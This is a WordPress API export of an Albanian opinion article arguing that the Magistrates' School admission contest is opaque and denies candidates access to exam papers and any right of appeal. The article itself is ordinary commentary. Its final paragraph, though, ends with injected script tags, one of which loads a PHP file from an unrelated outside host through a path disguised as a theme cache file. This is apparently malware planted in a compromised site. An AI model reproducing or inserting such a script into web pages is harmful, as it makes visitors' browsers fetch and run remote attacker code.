{"id":467,"date":"2013-09-30T11:14:39","date_gmt":"2013-09-30T09:14:39","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=467"},"modified":"2013-09-30T11:14:39","modified_gmt":"2013-09-30T09:14:39","slug":"bunkeri-i-magjistratures","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=467","title":{"rendered":"Bunkeri i Magjistratur\u00ebs"},"content":{"rendered":"<p align=\"right\"><i>Nga: Dorian Matlija<\/i><\/p>\n<p align=\"right\"><i>\u00a0<\/i><\/p>\n<p>1. Shkolla e Magjistratur\u00ebs nuk \u00ebsht\u00eb thjesht nj\u00eb shkoll\u00eb ku p\u00ebrgatiten gjyqtar\u00ebt dhe prokuror\u00ebt e rinj. Ky institucion nuk t\u00eb pajis thjesht me nj\u00eb diplom\u00eb n\u00eb fund, me t\u00eb cil\u00ebn mund t\u00eb gjesh pun\u00eb ose jo. Pranimi n\u00eb Shkoll\u00ebn e Magjistratur\u00ebs t\u00eb vesh automatikisht me pushtetin gjyq\u00ebsor, i cili \u00ebsht\u00eb nj\u00ebri nga tre pushtetet, krahas atij legjislativ q\u00eb ushtrohet nga Kuvendi dhe pushtetit ekzekutiv q\u00eb ushtrohet nga K\u00ebshilli i Ministrave. T\u00eb gjith\u00eb e dim\u00eb se sa luft\u00eb e madhe b\u00ebhet p\u00ebr t\u00eb fituar mandatin e deputetit dhe me sa mund krijohen aleancat p\u00ebr t\u00eb vot\u00ebbesuar qeverin\u00eb. Nd\u00ebrsa lufta p\u00ebr t\u00eb fituar pushtetin gjyq\u00ebsor l\u00ebviz n\u00eb rrethana larg syve t\u00eb medias. Jo se nuk ka luft\u00eb, por vet\u00ebm se ajo nuk zhvillohet me mitingje e flamuj n\u00eb duar militant\u00ebsh. Ajo zhvillohet n\u00eb tryeza provimesh, por \u00ebsht\u00eb nj\u00eblloj e ethshme. T\u00eb gjith\u00eb e dim\u00eb se sa transparent \u00ebsht\u00eb procesi i zgjedhjeve t\u00eb deputet\u00ebve dhe ai i em\u00ebrimit t\u00eb ministrave. Nd\u00ebrsa veshja me tog\u00ebn e zez\u00eb t\u00eb gjyqtarit b\u00ebhet n\u00eb terr. Thuhet shpesh q\u00eb gjyqtar\u00ebt i em\u00ebron KLD. Po \u00ebsht\u00eb e v\u00ebrtet\u00eb, por KLD thjesht cakton se ku do punojn\u00eb gjyqtar\u00ebt, por jo se mund t\u00eb em\u00ebrojn\u00eb k\u00eb t\u00eb duan. Gjyqtar b\u00ebhet personi q\u00eb ka mbaruar Shkoll\u00ebn e Magjistratur\u00ebs dhe nj\u00eb her\u00eb i pranuar n\u00eb k\u00ebt\u00eb shkoll\u00eb, kandidati hyn n\u00eb nj\u00eb rrug\u00eb pa kthim p\u00ebr t\u2019u b\u00ebr\u00eb shum\u00eb shpejt gjyqtar. Syt\u00eb e medias zakonisht fokusohen vet\u00ebm kur gjyqtar\u00ebt b\u00ebjn\u00eb gj\u00ebma t\u00eb m\u00ebdha, por momenti kur ata fitojn\u00eb t\u00eb drejt\u00ebn t\u00eb jen\u00eb t\u00eb till\u00eb kalohet si pa u v\u00ebn\u00eb re.<\/p>\n<p>&nbsp;<\/p>\n<p>2. Para pak dit\u00ebsh u zhvillua n\u00eb Shkoll\u00ebn e Magjistratur\u00ebs konkursi i pranimit n\u00eb vitin e ri akademik 2013-2014. Mor\u00ebn pjes\u00eb rreth 100 kandidat\u00eb por vet\u00ebm 11 prej tyre do p\u00ebrzgjidheshin fitues. Kjo shkoll\u00eb preferon ta quaj\u00eb provim, por duhet th\u00ebn\u00eb se m\u00eb shum\u00eb se nj\u00eb provim i zakonsh\u00ebm, ai q\u00eb u zhvillua \u00ebsht\u00eb nj\u00eb konkurs, ose m\u00eb mir\u00eb le ta quajm\u00eb gar\u00eb. N\u00eb k\u00ebt\u00eb gar\u00eb nuk fiton ai q\u00eb ka marr\u00eb nj\u00eb num\u00ebr t\u00eb caktuar pik\u00ebsh, por ai qe ka marr\u00eb m\u00eb shum\u00eb pik\u00eb se konkurent\u00ebt e tjer\u00eb.<\/p>\n<p>&nbsp;<\/p>\n<p>Megjith\u00ebse u mor\u00ebn masa sigurie, nuk u garantua nj\u00eb procesi i rregullt konkurimi, sepse:<\/p>\n<p>&nbsp;<\/p>\n<p>S\u00eb pari, kandidat\u00ebve nuk iu njihet e drejta e informimit mbi provimet. Sipas drejtuesve, secili kandidat mund t\u00eb shoh\u00eb vet\u00ebm provimin e tij (pa pasur t\u00eb drejt\u00eb t\u00eb marr\u00eb as nj\u00eb fotokopje me vete), por jo at\u00eb t\u00eb kandidat\u00ebve t\u00eb tjer\u00eb. T\u00eb mos b\u00ebsh transparenc\u00ebn e provimeve t\u00eb fituesve \u00ebsht\u00eb e padrejt\u00eb sepse nj\u00eb kandidat nuk penalizohet vet\u00ebm kur provimi i tij \u00ebsht\u00eb vler\u00ebsuar gabim, por edhe kur nj\u00eb kandidati tjet\u00ebr i jepen m\u00eb shum\u00eb pik\u00eb pa t\u00eb drejt\u00eb. Si n\u00eb rastin kur kandidati nuk \u00ebsht\u00eb vler\u00ebsuar drejt, ashtu edhe n\u00eb rastin kur konkurent\u00ebt e tjer\u00eb jan\u00eb vler\u00ebsuar me m\u00eb shum\u00eb pik\u00eb, rezultati \u00ebsht\u00eb q\u00eb dikush fiton pushtetin gjyq\u00ebsor pa t\u00eb drejt\u00eb, dhe dikujt tjetri i mohohet ky pushtet pa t\u00eb drejt\u00eb.<\/p>\n<p>&nbsp;<\/p>\n<p>S\u00eb dyti, kandidat\u00ebt nuk kan\u00eb t\u00eb drejt\u00eb t\u00eb ankohen askund. Ankimi lejohet vet\u00ebm kur \u00ebsht\u00eb b\u00ebr\u00eb ndonj\u00eb mbledhje aritmetike e gabuar e pik\u00ebve ose kur nuk \u00ebsht\u00eb b\u00ebr\u00eb mir\u00eb procedura, por n\u00eb asnj\u00eb rast kur pyetjet jan\u00eb vler\u00ebsuar gabim nga komisioni, qoft\u00eb edhe kur duke hapur, sic thot\u00eb populli \u201cb\u00ebn muuu\u201d q\u00eb vler\u00ebsimi \u00ebsht\u00eb b\u00ebr\u00eb gabim. Madje ka edhe raste kur vler\u00ebsimi b\u00ebhet me pik\u00eb sipas qejfit, n\u00eb m\u00ebnyr\u00eb t\u00ebr\u00ebsisht subjective dhe pa asnj\u00eb argument t\u00eb vlefsh\u00ebm. N\u00ebse provon t\u00eb pyes\u00ebsh pse ndodh kjo, p\u00ebrgjigja q\u00eb merr \u00ebsht\u00eb se komisioni \u00ebsht\u00eb i p\u00ebrb\u00ebr\u00eb nga 5 profesionist\u00eb, t\u00eb cil\u00ebt zor se mund t\u00eb gabojn\u00eb. Por a nuk gjykon me 5 gjyqtar\u00ebt edhe Gjykata e Lart\u00eb? E pra shum\u00eb vendime t\u00eb saj jan\u00eb cil\u00ebsuar t\u00eb gabuara nga Gjykata Kushtetuese. Madje edhe kjo e fundit, megjith\u00ebse gjykon me 9 profesionist\u00eb super t\u00eb p\u00ebrgatitur, p\u00ebrs\u00ebri ka raste kur Gjykata e Strasburgut e kap n\u00eb gabim. Pra trupa me 5 profesionist\u00eb nuk \u00ebsht\u00eb e pagabueshme, aq m\u00eb tep\u00ebr kur kontrollon 100 teza provimesh nj\u00ebkoh\u00ebsisht. P\u00ebrvec gabimit, nuk p\u00ebrjashtohet mund\u00ebsia q\u00eb vler\u00ebsimi i gabuar t\u00eb jet\u00eb i q\u00ebllimsh\u00ebm, cka e b\u00ebn akoma m\u00eb t\u00eb domosdosh\u00ebm ankimin. Megjithat\u00eb askush nuk paska t\u00eb drejt\u00eb t\u00eb ankohet, sepse Rregullorja e Provimit nuk e parashikon nj\u00eb t\u00eb drejt\u00eb t\u00eb till\u00eb\u2026<\/p>\n<p>&nbsp;<\/p>\n<p>N\u00ebse v\u00ebshtrojm\u00eb m\u00ebnyr\u00eb se si fitohet mandati i deputetit, bie n\u00eb sy fakti q\u00eb konkurent\u00ebt kan\u00eb akses t\u00eb plot\u00eb n\u00eb dokumentacionin e votimit. Madje flet\u00ebt e votimit num\u00ebrohen n\u00eb sy t\u00eb t\u00eb gjith\u00ebve. Gjithashtu pal\u00ebt kan\u00eb t\u00eb drejt\u00eb t\u00eb ankohen n\u00eb KQZ e m\u00eb pas edhe n\u00eb Kolegjin Zgjedhor. Por kandidat\u00ebt p\u00ebr magistrat\u00eb nuk kan\u00eb t\u00eb drejt\u00eb t\u00eb ken\u00eb akses n\u00eb provime, dhe as t\u00eb ankohen p\u00ebr vendimet dhe vler\u00ebsimet e padrejta. Shkolla e Magjistratur\u00ebs preferon t\u00eb vendos\u00eb n\u00eb form\u00ebn m\u00eb t\u00eb prer\u00eb t\u00eb mundshme.<\/p>\n<p>&nbsp;<\/p>\n<p>3. I.H. \u00ebsht\u00eb nj\u00eb kandidate e vitit t\u00eb kaluar, e cila \u00ebsht\u00eb nj\u00eb nga kandidat\u00ebt q\u00eb ka marr\u00eb guximin t\u00eb padis\u00eb n\u00eb gjykat\u00eb Shkoll\u00ebn e Magjistratur\u00ebs p\u00ebr parregullsi n\u00eb provim. M\u00eb 26 korrik t\u00eb k\u00ebtij viti gjykata e pranoi padin\u00eb. Pasi vendimi t\u00eb marr\u00eb form\u00eb t\u00eb prer\u00eb, I.H. do t\u00eb futet me pahir n\u00eb Shkoll\u00ebn e Magjistratur\u00ebs dhe do t\u00eb b\u00ebhet gjyqtare.<\/p>\n<p>&nbsp;<\/p>\n<p>Mir\u00ebpo, duke lexuar n\u00eb vendim, thuhet se kjo kandidate fillimisht \u00ebsht\u00eb ankuar pran\u00eb Shkoll\u00ebs s\u00eb Magjistratur\u00ebs dhe m\u00eb pas iu drejtua gjykat\u00ebs. Duhet th\u00ebn\u00eb se ankimi paraprak \u00ebsht\u00eb i detyruesh\u00ebm dhe askush nuk mund t\u00eb ankohet n\u00eb gjykat\u00eb para se t\u00eb konsumoj\u00eb t\u00eb drejt\u00ebn e ankimit pran\u00eb vet\u00eb autoritetit administrativ (n\u00eb k\u00ebt\u00eb rast vet\u00eb Shkolla e Magjistratur\u00ebs). Shum\u00eb i cuditsh\u00ebm \u00ebsht\u00eb fakti q\u00eb ajo e ka bazuar ankimin tek Rregullorja. Them i cuditsh\u00ebm, sepse n\u00ebse v\u00ebshtrojm\u00eb rregulloren nuk gjendet askund t\u00eb p\u00ebrmendet e drejta e ankimit. Askund. At\u00ebher\u00eb ku e gjeti gjykata dhe kandidatja padit\u00ebse k\u00ebt\u00eb t\u00eb drejt\u00eb? Arsyeja t\u00eb shtyn t\u00eb besosh q\u00eb rregullorja e sivjetme mund t\u00eb ket\u00eb ndryshuar. N\u00eb nj\u00eb intervist\u00eb t\u00eb vitit t\u00eb kaluar t\u00eb Drejtoresh\u00ebs s\u00eb Shkoll\u00ebs s\u00eb Magjistratur\u00ebs dh\u00ebn\u00eb n\u00eb gazet\u00ebn \u201cTelegraf\u201d, ajo p\u00ebrmend procedur\u00ebn e ankimit dhe madje p\u00ebrmend edhe se ka pasur nj\u00eb rast ankimi. N\u00eb fakt, thuhet se rregullorja dikur e ka pasur t\u00eb p\u00ebrfshir\u00eb t\u00eb drejt\u00ebn e ankimit, por m\u00eb pas, me nd\u00ebrrimin e drejtuesve, cudit\u00ebrisht \u00ebsht\u00eb shfuqizuar. Kjo gj\u00eb ka ndodhur pasi e drejta e ankimit u p\u00ebrdor nga kandidat\u00ebt \u201cnon grata\u201d, duke mbyllur rrug\u00ebt q\u00eb t\u00eb aft\u00ebt t\u00eb ken\u00eb mund\u00ebsi t\u00eb rr\u00ebmbejn\u00eb pushtetin e gjyqtarit edhe kur Shkolla e Magjistratur\u00ebs nuk d\u00ebrishon t\u2019ja jap\u00eb.<\/p>\n<p>&nbsp;<\/p>\n<p>* * *<\/p>\n<p>&nbsp;<\/p>\n<p>Nj\u00eb proces jo transparent dhe pa t\u00eb drejt\u00eb ankimi, bie ndesh me t\u00eb gjith\u00eb parimet e nj\u00eb konkurimi t\u00eb drejt\u00eb. N\u00eb cdo rast, n\u00eb tendera, dh\u00ebnie koncesionesh apo licensash, konkurent\u00ebt kan\u00eb t\u00eb drejt\u00eb t\u00eb njihen me cdo dokument t\u00eb paraqitur nga konkurent\u00ebt apo ofertuesit e tjer\u00eb. Madje edhe p\u00ebr gj\u00ebra m\u00eb pak t\u00eb r\u00ebnd\u00ebsishme, sic bie fjala, n\u00eb festivalin e k\u00ebng\u00ebs n\u00eb RTSH, artist\u00ebt kan\u00eb t\u00eb drejt\u00eb t\u00eb ankohen dhe t\u00eb shohin procesverbalet\u00a0 e votimit t\u00eb juris\u00eb. Ky rregull nuk mund t\u00eb mungoj\u00eb n\u00eb shkoll\u00ebn m\u00eb t\u00eb r\u00ebnd\u00ebsishme t\u00eb Republik\u00ebn e Shqip\u00ebris\u00eb, q\u00eb \u00ebsht\u00eb ajo e magjistratur\u00ebs, e cila sic e thash\u00eb nuk \u00ebsht\u00eb shkoll\u00eb por \u00ebsht\u00eb burimi i vet\u00ebm dhe i padiskutuesh\u00ebm i pushtetit gjyq\u00ebsor t\u00eb nes\u00ebrm.<\/p>\n<p>&nbsp;<\/p>\n<p>Dhe t\u00eb mendosh q\u00eb nga gjerat m\u00eb t\u00eb r\u00ebnd\u00ebsishme q\u00eb gjyqtar\u00ebt e rinj m\u00ebsojn\u00eb n\u00eb shkoll\u00eb \u00ebsht\u00eb se n\u00eb baz\u00eb t\u00eb nenit 10 t\u00eb Konvent\u00ebs Europiane p\u00ebr t\u00eb Drejtat e Njeriut cilitdo i njihet \u00a0e drejta p\u00ebr t\u00eb pasur informacion n\u00eb cdo dokument publik, dhe n\u00eb baz\u00eb t\u00eb nenit 13 t\u00eb k\u00ebsaj konvente cilitdo i duhet garantuar e drejta e ankimit efektiv. Megjithat\u00eb Shkolla e Magjistratur\u00ebs thjesht i jep k\u00ebto leksione n\u00eb kuptimin teorik sepse vet\u00eb \u00ebsht\u00eb bunker dhe ligji i vjen anash. N\u00eb k\u00ebt\u00eb bunker gjyqtar\u00ebve t\u00eb rinj u m\u00ebsohen teorit\u00eb e bukura me tem\u00eb nga shteti i s\u00eb drejt\u00ebs. Por magistrat\u00ebs e rinj q\u00eb studiojn\u00eb n\u00eb k\u00ebt\u00eb bunker, me apo pa dashjen e tyre, kan\u00eb p\u00ebrfituar nga shkelja e t\u00eb drejtave t\u00eb dikujt tjetri, t\u00eb cilit nuk i jan\u00eb njohur e drejta e ankimit dhe ajo e informimit. K\u00ebsaj i thon\u00eb t\u00eb fillosh karrier\u00ebn e gjyqtarit nga bunkeri, me k\u00ebmb\u00ebn e keqe. Kjo dukuri nuk \u00ebsht\u00eb gj\u00eb tjet\u00ebr vecse gjeneza e nj\u00eb pushteti e nisur me hapin e keq, e cila sjell\u00eb m\u00eb pas hyrjen n\u00eb nj\u00eb valle n\u00ebn tingujt e daulles s\u00eb atij q\u00eb t\u00eb ka n\u00eb dor\u00eb dhe q\u00eb nuk cfar\u00eb ti b\u00ebsh, nd\u00ebrkoh\u00eb q\u00eb ata q\u00eb mund ta meritojn\u00eb m\u00eb shum\u00eb duhet t\u00eb mos shohin, t\u00eb mos ankohen e t\u00eb mos flasin. Duhet t\u00eb rrijn\u00eb Sus!<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nga: Dorian Matlija \u00a0 1. Shkolla e Magjistratur\u00ebs nuk \u00ebsht\u00eb thjesht nj\u00eb shkoll\u00eb ku p\u00ebrgatiten gjyqtar\u00ebt dhe prokuror\u00ebt e rinj. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":468,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,5],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/467"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=467"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/467\/revisions"}],"predecessor-version":[{"id":469,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/467\/revisions\/469"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/468"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=467"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=467"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=467"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}